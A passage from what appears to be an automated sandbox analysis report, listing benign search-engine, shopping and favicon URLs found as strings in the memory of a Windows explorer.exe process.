          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2218367895.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2216707466.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000008.00000000.2216707466.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 00000008.00000000.2216995609.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000008.00000000.2216995609.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: explorer.exe, 00000008.00000000.2212012859.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000008.00000000.2216995609.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2218367895.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000008.00000000.2218367895.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000008.00000000.2216995609.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000008.00000000.2228808458.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: explorer.exe, 00000008.00000000.2212012859.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2218367895.0000000004B50000.00000002.00000001.sdmp | String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.de/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.es/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.it/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.google.si/
          Source: explorer.exe, 00000008.00000000.2216707466.0000000003C40000.00000002.00000001.sdmp | String found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.iask.com/favicon.ico
